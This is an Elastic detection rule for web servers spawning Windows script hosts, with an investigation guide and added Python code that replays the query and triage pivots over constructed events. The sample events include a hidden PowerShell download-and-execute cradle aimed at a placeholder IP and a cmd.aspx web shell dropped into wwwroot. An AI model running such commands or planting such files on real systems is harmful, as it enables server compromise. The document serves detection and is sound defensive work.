Web Shell Detection: Script Process Child of Common Web Processes

Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access.

Elastic rule (View on GitHub)

[metadata]
creation_date = "2021/08/24"
integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"]
maturity = "production"
updated_date = "2026/05/03"

[rule]
author = ["Elastic"]
description = "Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access."
false_positives = [
    """
    Security audits, maintenance, and network administrative scripts may trigger this alert; treat a hit as benign only
    when parent context, child identity, command scope, service identity, and available artifact or destination evidence
    align to the same bounded workflow.
    """,
]
from = "now-9m"
index = [
    "endgame-*",
    "logs-crowdstrike.fdr*",
    "logs-endpoint.events.process-*",
    "logs-m365_defender.event-*",
    "logs-sentinel_one_cloud_funnel.*",
    "logs-system.security*",
    "logs-windows.sysmon_operational-*",
    "winlogbeat-*",
]
language = "kuery"
license = "Elastic License v2"
name = "Web Shell Detection: Script Process Child of Common Web Processes"
references = [
    "https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/",
    "https://www.elastic.co/security-labs/elastic-response-to-the-the-spring4shell-vulnerability-cve-2022-22965",
    "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1",
]
risk_score = 73
rule_id = "2917d495-59bd-4250-b395-c29409b76086"
severity = "high"
tags = [
    "Domain: Endpoint",
    "OS: Windows",
    "Use Case: Threat Detection",
    "Tactic: Persistence",
    "Resources: Investigation Guide",
    "Data Source: Elastic Endgame",
    "Data Source: Elastic Defend",
    "Data Source: SentinelOne",
    "Data Source: Windows Security Event Logs",
    "Data Source: Microsoft Defender XDR",
    "Data Source: Sysmon",
    "Data Source: Crowdstrike",
]
timestamp_override = "event.ingested"
type = "new_terms"

query = '''
host.os.type:windows and event.category:process and event.type:start and process.args : * and
  process.parent.name:("w3wp.exe" or "httpd.exe" or "nginx.exe" or "php.exe" or "php-cgi.exe" or "tomcat.exe" or "ArcSOC.exe") and
  (
    process.name : ("cmd.exe" or "cscript.exe" or "powershell.exe" or "pwsh.exe" or "powershell_ise.exe" or "wmic.exe" or "wscript.exe") or
    process.name.caseless : ("cmd.exe" or "cscript.exe" or "powershell.exe" or "pwsh.exe" or "powershell_ise.exe" or "wmic.exe" or "wscript.exe")
  ) and
  not
  (
    process.command_line : (
      "cmd.exe /c mode CON" or
      "cmd.exe /s /c \"mode CON\"" or
      "cmd.exe /c \"mode\"" or
      "cmd.exe /s /c \"tput colors 2>&1\"" or
      "cmd.exe /s /c \"stty 2> NUL\"" or
      "cmd.exe /s /c \"stty 2>&1\"" or
      "cmd.exe /c \"stty 2>&1\"" or
      "cmd.exe /s /c \"ipconfig /all 2>&1\"" or
      "cmd.exe /s /c \"echo '%os%'\"" or
      *.\\install\\awk.exe*
    ) or
    process.args : (\(git or (*artisan* and *queue\:work*) or *rmdir* or "mode CON" or ver or ls or mode or dir) or

    (process.name:cmd.exe and process.parent.args : "c:\\\\xampp\\\\htdocs\\\\open-audit\\\\index.php") or

    (process.name:cmd.exe and process.args:("/V:ON" and "--header-html")) or

    (process.parent.args:"WebCession" and process.args:E\:\\Data\\CLM\\cession\\*.bat) or

    (process.parent.executable :"D:\\AiDKlinik\\php\\php-cgi.exe" and process.args:D\:\\AiDKlinik\\web*) or

    (process.parent.args :"E:/wamp64/bin/apache/apache2.4.62.1" and process.args:node*) or

    (process.parent.name:"php.exe" and process.name:"cmd.exe" and process.args:("/V:ON" and "/E:ON"))
  )
'''

note = """## Triage and analysis

#### Possible investigation steps

- What execution path did the alert capture?
  - Focus: child `process.executable` / `process.command_line`; web-parent `process.parent.name`, `process.parent.executable`, and `process.parent.command_line` for IIS/Apache/nginx/PHP CGI/Tomcat/ArcGIS.
  - Implication: escalate when a web-facing parent launches a shell, script host, downloader, archive tool, or admin utility outside bounded tasks; lower only when parent context, child path, and command match one exact deployment, health-check, log rotation, or support task.
- Is the child command administration or post-exploitation?
  - Focus: `process.command_line`: WMIC, download cradles, archive creation, account/system discovery, service control, credential access, script-host flags, or web-root/temp/backup/app-content paths.
  - Hint: for PowerShell, reconstruct script blocks by `host.id` and `process.pid` via `powershell.file.script_block_text`, `powershell.sequence`, and `powershell.total`; missing PowerShell telemetry is unresolved, not benign.
  - Implication: escalate when the command stages payloads, runs discovery, creates accounts, changes services, or writes to web-accessible or temp paths; lower suspicion when bounded to one recognized deployment, health-check, log rotation, or support task.
- Is user context human admin or service identity?
  - Why: web-process children often inherit app-pool or service identity; `user.id`, `user.name`, and `user.domain` do not prove human initiation.
  - Focus: `@timestamp`, `user.id`, `user.name`, `process.Ext.session_info.logon_type`, and `process.parent.command_line`.
  - Implication: escalate when service or network logon context launches interactive troubleshooting, remote administration, or off-hours shell activity without a matching window; lower suspicion when identity, logon type, parent pool/service, and command scope fit one exact workflow.
- Does child binary identity fit its command?
  - Focus: `process.executable`, `process.pe.original_file_name`, `process.hash.sha256`, `process.code_signature.subject_name`, and `process.code_signature.trusted`.
  - Implication: escalate when the child is renamed, unsigned/untrusted, running from a user-writable path, or mismatched to its original file name; lower suspicion when identity and path match stable tooling, but continue because trusted binaries can carry web-shell commands.
- Did file telemetry show web-shell placement, staging, or config changes?
  - Focus: if file telemetry exists, review `host.id` file events for child `process.entity_id` or `process.pid`, checking `file.path`, `file.Ext.original.path`, and `file.Ext.windows.zone_identifier`. $investigate_1
  - Hint: a script written into the web root with no later process start is still web-shell evidence (a script-only variant); if the child writes a script or executable, query process starts on the same `host.id` where `process.executable` equals that path.
  - Implication: escalate when the child writes ASPX, ASP, PHP, JSP, JS, BAT, PS1, EXE, DLL, JAR, WAR, or archives to web-accessible/temp/user-writable paths, or a written artifact later executes; missing file telemetry is unresolved, not benign, and its absence does not close the alert.
- Did the child launch second-stage processes?
  - Focus: child starts on `host.id` where `process.parent.entity_id` equals child `process.entity_id`, checking `process.executable`, `process.command_line`, and `process.hash.sha256`. $investigate_2
  - Implication: escalate when descendants include shells, script hosts, downloaders, archive tools, credential utilities, service control, or persistence tooling; absence only narrows impact when command, file, network, and related alerts also fit a benign workflow.
- Did DNS/network telemetry show retrieval or control?
  - Focus: if DNS/network telemetry exists, review child `process.entity_id` events on `host.id`, separating `dns.question.name` / `dns.resolved_ip` from `destination.ip` / `destination.port`; compare role with command intent. $investigate_3
  - Hint: map DNS results to later connection IPs before linking query and connection; if a third-party alert lacks `process.entity_id`, recover the child by `host.id`, `process.pid`, and `@timestamp`. Missing network/DNS telemetry is unresolved, not benign.
  - Implication: escalate when the child retrieves tools from public infrastructure, reaches rare/misaligned destinations, or connects outside web-server administration; decide from alert-local process evidence and corroboration when DNS/network telemetry is unavailable.
- Do related alerts show broader compromise?
  - Focus: same-web-parent starts and 48h `host.id` alerts for web-shell, credential-access, discovery, archive, lateral-movement, persistence, or anti-forensics.
    - $investigate_4
    - $investigate_0
  - Implication: escalate scope when alerts cluster around the same server role, child command family, or staged artifacts; absence only narrows response scope when local parent-child, command, identity, file, and network evidence are explained.
- What disposition fits?
  - Implication: escalate on unexplained server-side execution, exploit-like command intent, suspicious child identity, payload staging, rare destinations, or broader compromise; do not wait for optional pivots when alert-local process evidence is unsafe. Close only when same-host alert-window telemetry proves one exact benign web-server workflow; use outside confirmation for legitimacy gaps. If evidence is mixed or visibility incomplete, preserve artifacts and escalate.

### False positive analysis

- Web deployment, post-install validation, health checks, vendor extension install, ArcGIS publishing, or maintenance can spawn "cmd.exe", PowerShell, or "wscript.exe" from web components. Confirm only when parent, child, command, service identity, and artifact/destination evidence describe the same alert-window workflow with no unexpected web-content writes, rare callbacks, or contradictions.
- If telemetry proves shape but not legitimacy, require matching change, deployment, runbook, vendor, or owner confirmation; after closure, review prior occurrences to check that the exception pattern is stable.
- Build exceptions from the minimum confirmed pattern: web parent command, child executable/hash/signature, command line, `user.id`, `host.id`, and bounded content path or destination when decisive. Avoid exceptions on parent name, `process.name`, or `host.id` alone.

### Response and remediation

- If confirmed benign, reverse temporary containment, document exact parent, child, command, service identity, artifact/destination evidence, and confirmation, and create exceptions only from that pattern.
- If suspicious but unconfirmed, preserve the alert/export, process tree, child/parent entity IDs, command lines, hash, staged-file copies, destinations, related alerts, and web/app logs around `@timestamp` before containment or cleanup.
- Apply reversible containment tied to evidence: block confirmed malicious destinations, restrict affected site/app access, disable exposed extension or virtual directory, or increase `host.id` monitoring. Isolate only when evidence and server criticality permit.
- If confirmed malicious, contain the host or terminate the child only after preservation; if direct response is unavailable, escalate with process/artifact/destination/server-log evidence to the team that can contain the server, disable the exposed path, or stop the service.
- Before deletion/restoration, hunt for the same hash, child command, staged path, domain, IP, and port across hosts/accounts. Then remove web shells, scripts, archives, scheduled tasks, dropped utilities, and persistence; restore known-good content/config; rotate exposed service, app, or admin credentials if secrets may be exposed.
- After containment, patch the implicated app, extension, framework, or server component; review the internet-exposed site/service that launched the child; retain endpoint, network, and web logs; document script-only variants or logging gaps.
"""

setup = """## Setup

This rule is designed for data generated by [Elastic Defend](https://www.elastic.co/security/endpoint-security), which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules.

Setup instructions: https://ela.st/install-elastic-defend

### Additional data sources

This rule also supports the following third-party data sources. For setup instructions, refer to the links below:

- [CrowdStrike](https://ela.st/crowdstrike-integration)
- [Microsoft Defender XDR](https://ela.st/m365-defender)
- [SentinelOne Cloud Funnel](https://ela.st/sentinel-one-cloud-funnel)
- [Sysmon Event ID 1 - Process Creation](https://ela.st/sysmon-event-1-setup)
- [Windows Process Creation Logs](https://ela.st/audit-process-creation)
"""

[[rule.filters]]
[rule.filters.meta]
negate = true
[rule.filters.query.wildcard."process.command_line"]
case_insensitive = true
value = "*?:\\\\Program Files\\\\*"

[[rule.filters]]
[rule.filters.meta]
negate = true
[rule.filters.query.wildcard."process.command_line"]
case_insensitive = true
value = "*?:\\\\Program Files (x86)\\\\*"

[rule.investigation_fields]
field_names = [
    "@timestamp",
    "host.name",
    "host.id",
    "user.id",
    "process.entity_id",
    "process.pid",
    "process.executable",
    "process.command_line",
    "process.Ext.session_info.logon_type",
    "process.pe.original_file_name",
    "process.code_signature.subject_name",
    "process.code_signature.trusted",
    "process.hash.sha256",
    "process.parent.executable",
    "process.parent.command_line",
]

[transform]

[[transform.investigate]]
label = "Alerts associated with the host"
description = ""
providers = [
  [
    { excluded = false, field = "event.kind", queryType = "phrase", value = "signal", valueType = "string" },
    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" }
  ]
]
relativeFrom = "now-48h/h"
relativeTo = "now"

[[transform.investigate]]
label = "File events for the suspicious child process"
description = ""
providers = [
  [
    { excluded = false, field = "event.category", queryType = "phrase", value = "file", valueType = "string" },
    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
    { excluded = false, field = "process.entity_id", queryType = "phrase", value = "{{process.entity_id}}", valueType = "string" }
  ],
  [
    { excluded = false, field = "event.category", queryType = "phrase", value = "file", valueType = "string" },
    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
    { excluded = false, field = "process.pid", queryType = "phrase", value = "{{process.pid}}", valueType = "string" }
  ]
]
relativeFrom = "now-1h"
relativeTo = "now"

[[transform.investigate]]
label = "Child process events from the suspicious child"
description = ""
providers = [
  [
    { excluded = false, field = "event.category", queryType = "phrase", value = "process", valueType = "string" },
    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
    { excluded = false, field = "process.parent.entity_id", queryType = "phrase", value = "{{process.entity_id}}", valueType = "string" }
  ]
]
relativeFrom = "now-1h"
relativeTo = "now"

[[transform.investigate]]
label = "Network events for the suspicious child process"
description = ""
providers = [
  [
    { excluded = false, field = "event.category", queryType = "phrase", value = "network", valueType = "string" },
    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
    { excluded = false, field = "process.entity_id", queryType = "phrase", value = "{{process.entity_id}}", valueType = "string" }
  ],
  [
    { excluded = false, field = "event.category", queryType = "phrase", value = "network", valueType = "string" },
    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
    { excluded = false, field = "process.pid", queryType = "phrase", value = "{{process.pid}}", valueType = "string" }
  ]
]
relativeFrom = "now-1h"
relativeTo = "now"

[[transform.investigate]]
label = "Process events from the same web parent"
description = ""
providers = [
  [
    { excluded = false, field = "event.category", queryType = "phrase", value = "process", valueType = "string" },
    { excluded = false, field = "host.id", queryType = "phrase", value = "{{host.id}}", valueType = "string" },
    { excluded = false, field = "process.parent.entity_id", queryType = "phrase", value = "{{process.parent.entity_id}}", valueType = "string" }
  ]
]
relativeFrom = "now-1h"
relativeTo = "now"

[rule.new_terms]
field = "new_terms_fields"
value = ["host.id", "process.command_line"]
[[rule.new_terms.history_window_start]]
field = "history_window_start"
value = "now-7d"

[[rule.threat]]
framework = "MITRE ATT&CK"

[[rule.threat.technique]]
id = "T1505"
name = "Server Software Component"
reference = "https://attack.mitre.org/techniques/T1505/"

[[rule.threat.technique.subtechnique]]
id = "T1505.003"
name = "Web Shell"
reference = "https://attack.mitre.org/techniques/T1505/003/"

[rule.threat.tactic]
id = "TA0003"
name = "Persistence"
reference = "https://attack.mitre.org/tactics/TA0003/"

[[rule.threat]]
framework = "MITRE ATT&CK"

[[rule.threat.technique]]
id = "T1190"
name = "Exploit Public-Facing Application"
reference = "https://attack.mitre.org/techniques/T1190/"

[rule.threat.tactic]
id = "TA0001"
name = "Initial Access"
reference = "https://attack.mitre.org/tactics/TA0001/"

[[rule.threat]]
framework = "MITRE ATT&CK"

[[rule.threat.technique]]
id = "T1047"
name = "Windows Management Instrumentation"
reference = "https://attack.mitre.org/techniques/T1047/"

[[rule.threat.technique]]
id = "T1059"
name = "Command and Scripting Interpreter"
reference = "https://attack.mitre.org/techniques/T1059/"

[[rule.threat.technique.subtechnique]]
id = "T1059.001"
name = "PowerShell"
reference = "https://attack.mitre.org/techniques/T1059/001/"

[[rule.threat.technique.subtechnique]]
id = "T1059.003"
name = "Windows Command Shell"
reference = "https://attack.mitre.org/techniques/T1059/003/"

[[rule.threat.technique.subtechnique]]
id = "T1059.005"
name = "Visual Basic"
reference = "https://attack.mitre.org/techniques/T1059/005/"

[[rule.threat.technique.subtechnique]]
id = "T1059.007"
name = "JavaScript"
reference = "https://attack.mitre.org/techniques/T1059/007/"

[rule.threat.tactic]
id = "TA0002"
name = "Execution"
reference = "https://attack.mitre.org/tactics/TA0002/"
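The query above, replayed offline in Python so the matching, the carve-outs and the new_terms deduplication can be checked against sample events. This is an added example, not Elastic's code: it mirrors the positive match (web parent, script-host child, non-empty args), the quoted command-line and process.args exclusions, the two Program Files filters from rule.filters, and a (host.id, process.command_line) new-terms tracker with the rule's 7-day history window. The deployment-specific compound exclusions (open-audit, WebCession, AiDKlinik, wamp64, php.exe /V:ON /E:ON) are left out. Field names are ECS; the function names, the events, the host IDs and the 198.51.100.7 address are constructed for the example.

```python
"""Offline replay of the rule's matching logic over constructed ECS-style events.
Added example, not Elastic's code. The deployment-specific compound carve-outs in the
query (open-audit, WebCession, AiDKlinik, wamp64, php.exe /V:ON /E:ON) are left out."""
import fnmatch
from datetime import datetime, timedelta, timezone

WEB_PARENTS = {"w3wp.exe", "httpd.exe", "nginx.exe", "php.exe",
               "php-cgi.exe", "tomcat.exe", "ArcSOC.exe"}
SCRIPT_HOSTS = {"cmd.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
                "powershell_ise.exe", "wmic.exe", "wscript.exe"}
# Exact command lines the query carves out (the quoted terms in its `not` clause).
EXCLUDED_CMDLINES = {
    "cmd.exe /c mode CON", 'cmd.exe /s /c "mode CON"', 'cmd.exe /c "mode"',
    'cmd.exe /s /c "tput colors 2>&1"', 'cmd.exe /s /c "stty 2> NUL"',
    'cmd.exe /s /c "stty 2>&1"', 'cmd.exe /c "stty 2>&1"',
    'cmd.exe /s /c "ipconfig /all 2>&1"', "cmd.exe /s /c \"echo '%os%'\"",
}
QUERY_CMDLINE_GLOBS = ["*.\\install\\awk.exe*"]             # case-sensitive, from the query
FILTER_CMDLINE_GLOBS = ["*?:\\Program Files\\*",             # case_insensitive = true, from rule.filters
                        "*?:\\Program Files (x86)\\*"]
EXCLUDED_ARG_TOKENS = {"(git", "mode CON", "ver", "ls", "mode", "dir"}  # single-argument terms
EXCLUDED_ARG_GLOBS = ["*rmdir*"]


def base_match(ev):
    """Positive half of the query. process.parent.name is a keyword (exact-case) match;
    the child is matched via process.name OR process.name.caseless, so lowercase it."""
    return (ev["host.os.type"] == "windows"
            and ev["event.category"] == "process" and ev["event.type"] == "start"
            and bool(ev["process.args"])
            and ev["process.parent.name"] in WEB_PARENTS
            and ev["process.name"].lower() in SCRIPT_HOSTS)


def excluded(ev):
    """The query's `not (...)` clause plus the two negated rule.filters."""
    cl, args = ev["process.command_line"], ev["process.args"]
    if cl in EXCLUDED_CMDLINES:
        return True
    if any(fnmatch.fnmatchcase(cl, g) for g in QUERY_CMDLINE_GLOBS):
        return True
    if any(fnmatch.fnmatchcase(cl.lower(), g.lower()) for g in FILTER_CMDLINE_GLOBS):
        return True
    if any(a in EXCLUDED_ARG_TOKENS for a in args):
        return True
    if any(fnmatch.fnmatchcase(a, g) for a in args for g in EXCLUDED_ARG_GLOBS):
        return True
    # (*artisan* and *queue\:work*): both substrings must occur somewhere in the args
    return any("artisan" in a for a in args) and any("queue:work" in a for a in args)


class NewTerms:
    """new_terms on (host.id, process.command_line): alert only when the pair was not
    seen during the preceding history window (history_window_start = now-7d)."""
    def __init__(self, window=timedelta(days=7)):
        self.window, self.last_seen = window, {}

    def is_new(self, key, ts):
        prev = self.last_seen.get(key)
        self.last_seen[key] = ts
        return prev is None or ts - prev > self.window


def run_rule(events, tracker=None):
    """Replay events in time order and return the ones that would raise an alert."""
    tracker = tracker or NewTerms()
    alerts = []
    for ev in sorted(events, key=lambda e: e["@timestamp"]):
        if base_match(ev) and not excluded(ev) and \
                tracker.is_new((ev["host.id"], ev["process.command_line"]), ev["@timestamp"]):
            alerts.append(ev)
    return alerts


def mk(ts, host, parent, name, cmdline, args):
    """Flat ECS-like process start event (constructed sample data)."""
    return {"@timestamp": ts, "host.id": host, "host.os.type": "windows",
            "event.category": "process", "event.type": "start",
            "process.parent.name": parent, "process.name": name,
            "process.command_line": cmdline, "process.args": args}


T0 = datetime(2024, 1, 10, 3, 0, tzinfo=timezone.utc)
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"  # documentation IP
SAMPLE_EVENTS = [  # constructed
    mk(T0, "web-01", "w3wp.exe", "cmd.exe", 'cmd.exe /c "whoami /all"',
       ["cmd.exe", "/c", "whoami /all"]),                                   # alert
    mk(T0 + timedelta(minutes=5), "web-01", "w3wp.exe", "cmd.exe", "cmd.exe /c mode CON",
       ["cmd.exe", "/c", "mode CON"]),                                      # carved out by the query
    mk(T0 + timedelta(hours=1), "web-01", "w3wp.exe", "cmd.exe", 'cmd.exe /c "whoami /all"',
       ["cmd.exe", "/c", "whoami /all"]),                                   # repeat inside the window: no alert
    mk(T0 + timedelta(hours=2), "web-02", "httpd.exe", "PowerShell.exe",
       f'powershell.exe -nop -w hidden -c "{CRADLE}"',
       ["powershell.exe", "-nop", "-w", "hidden", "-c", CRADLE]),           # alert (matched via name.caseless)
    mk(T0 + timedelta(hours=3), "web-02", "php-cgi.exe", "cmd.exe",
       'cmd.exe /c "C:\\Program Files\\Vendor\\healthcheck.bat"',
       ["cmd.exe", "/c", "C:\\Program Files\\Vendor\\healthcheck.bat"]),   # dropped by rule.filters
    mk(T0 + timedelta(hours=4), "web-01", "explorer.exe", "cmd.exe", "cmd.exe /c whoami",
       ["cmd.exe", "/c", "whoami"]),                                        # parent is not a web process
    mk(T0 + timedelta(days=8), "web-01", "w3wp.exe", "cmd.exe", 'cmd.exe /c "whoami /all"',
       ["cmd.exe", "/c", "whoami /all"]),                                   # history window expired: alerts again
]
```

run_rule(SAMPLE_EVENTS) returns three events: the first whoami, the PowerShell cradle, and the whoami repeated eight days later. The one-hour repeat is suppressed only because the pair is still inside the history window; once seven days pass the same host and command line alert again, so a recurring benign pattern needs an exception built the way the false-positive guidance describes rather than repeated closure. Note also that the Program Files filters apply to the whole command line, so a web-spawned cmd.exe that merely mentions a Program Files path anywhere in its arguments is dropped.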

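The investigation steps in the note above, run as code over a small constructed event set. This is an added example, not Elastic's code and not the rule's own transforms: it applies the $investigate_2 descendant walk recursively over process.parent.entity_id, narrows the $investigate_1 file pivot to script or binary writes under web-root or temp paths (the extensions the guide lists), collects the $investigate_3 destinations for the child and its descendants, and performs the guide's follow-up check of whether a written artifact later started as a process. Field names are ECS; the function names, the events, the host and entity IDs and the 198.51.100.7 address are constructed. For a third-party source without process.entity_id the same walk can be keyed on (host.id, process.pid) within the alert window, as the guide's hint suggests.

```python
"""Triage pivots from the rule's investigation guide, run over constructed ECS-style events.
Added example, not Elastic's code. Events are keyed by process.entity_id; for sources
that lack it, key on (host.id, process.pid) inside the alert window instead."""
from datetime import datetime, timedelta, timezone

# Extensions the guide names as web-shell/staging artifacts, and where they matter.
STAGED_EXTS = {".aspx", ".asp", ".php", ".jsp", ".js", ".bat", ".ps1",
               ".exe", ".dll", ".jar", ".war", ".zip", ".7z", ".rar"}
STAGING_DIRS = ("\\inetpub\\wwwroot\\", "\\htdocs\\", "\\webapps\\", "\\temp\\", "\\tmp\\")


def descendants(alert, procs):
    """$investigate_2, applied recursively: every process start whose parent chain
    leads back to the alerted child (process.parent.entity_id links)."""
    by_parent = {}
    for p in procs:
        by_parent.setdefault(p["process.parent.entity_id"], []).append(p)
    out, seen, stack = [], set(), [alert["process.entity_id"]]
    while stack:
        for child in by_parent.get(stack.pop(), []):
            if child["process.entity_id"] not in seen:
                seen.add(child["process.entity_id"])
                out.append(child)
                stack.append(child["process.entity_id"])
    return out


def staged_writes(ids, files):
    """$investigate_1, narrowed: writes by the alerted process or its descendants that
    drop script/binary content into web-accessible or temp paths."""
    hits = []
    for f in files:
        path = f["file.path"].lower()
        ext = path[path.rfind("."):] if "." in path else ""
        if f["process.entity_id"] in ids and ext in STAGED_EXTS \
                and any(d in path for d in STAGING_DIRS):
            hits.append(f["file.path"])
    return hits


def triage(alert, events, window=timedelta(hours=1)):
    """Scope to the alert's host and +/- window around @timestamp (the transforms use
    now-1h), run each pivot, and report what the guide asks the analyst to weigh."""
    lo, hi = alert["@timestamp"] - window, alert["@timestamp"] + window
    scope = [e for e in events
             if e["host.id"] == alert["host.id"] and lo <= e["@timestamp"] <= hi]
    procs = [e for e in scope if e["event.category"] == "process"]
    files = [e for e in scope if e["event.category"] == "file"]
    nets = [e for e in scope if e["event.category"] == "network"]
    kids = descendants(alert, procs)
    ids = {alert["process.entity_id"], *(k["process.entity_id"] for k in kids)}
    written = staged_writes(ids, files)
    written_lower = {w.lower() for w in written}
    return {
        "descendants": [k["process.command_line"] for k in kids],
        "staged_files": written,
        # the guide's follow-up: did a written artifact later start as a process?
        "executed_artifacts": sorted({p["process.executable"] for p in procs
                                      if p["process.executable"].lower() in written_lower}),
        # $investigate_3: destinations reached by the child or its descendants
        "destinations": sorted({(n["destination.ip"], n["destination.port"])
                                for n in nets if n["process.entity_id"] in ids}),
    }


# Constructed sample telemetry for one host; 198.51.100.7 is a documentation-range address.
T, H = datetime(2024, 1, 10, 3, 0, tzinfo=timezone.utc), "web-01"


def proc(dt, eid, parent, exe, cmd):
    return {"@timestamp": T + dt, "host.id": H, "event.category": "process",
            "process.entity_id": eid, "process.parent.entity_id": parent,
            "process.executable": exe, "process.command_line": cmd}


def filew(dt, eid, path):
    return {"@timestamp": T + dt, "host.id": H, "event.category": "file",
            "process.entity_id": eid, "file.path": path}


def net(dt, eid, ip, port):
    return {"@timestamp": T + dt, "host.id": H, "event.category": "network",
            "process.entity_id": eid, "destination.ip": ip, "destination.port": port}


s = timedelta(seconds=1)
ALERT = proc(0 * s, "e-cmd", "e-w3wp", "C:\\Windows\\System32\\cmd.exe",
             'cmd.exe /c "powershell -nop -w hidden -File C:\\Windows\\Temp\\a.ps1"')
SAMPLE_EVENTS = [
    ALERT,
    proc(5 * s, "e-ps", "e-cmd", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
         "powershell -nop -w hidden -File C:\\Windows\\Temp\\a.ps1"),
    net(8 * s, "e-ps", "198.51.100.7", 443),
    filew(10 * s, "e-ps", "C:\\inetpub\\wwwroot\\aspnet_client\\cmd.aspx"),
    filew(12 * s, "e-ps", "C:\\Windows\\Temp\\svc.exe"),
    proc(15 * s, "e-svc", "e-ps", "C:\\Windows\\Temp\\svc.exe", "svc.exe -install"),
    proc(60 * s, "e-other", "e-explorer", "C:\\Windows\\System32\\cmd.exe", "cmd.exe"),  # unrelated
    filew(3 * timedelta(hours=1), "e-ps", "C:\\inetpub\\wwwroot\\late.aspx"),           # outside the window
]
```

triage(ALERT, SAMPLE_EVENTS) reports two descendants (the PowerShell child and the svc.exe it started), two staged files, svc.exe as an artifact that was written and then executed, and one destination. The late.aspx write is not reported because it falls outside the one-hour window the transforms use, which is why the guide treats an empty pivot as unresolved rather than benign: widen the window or query the file index directly before concluding that nothing was staged.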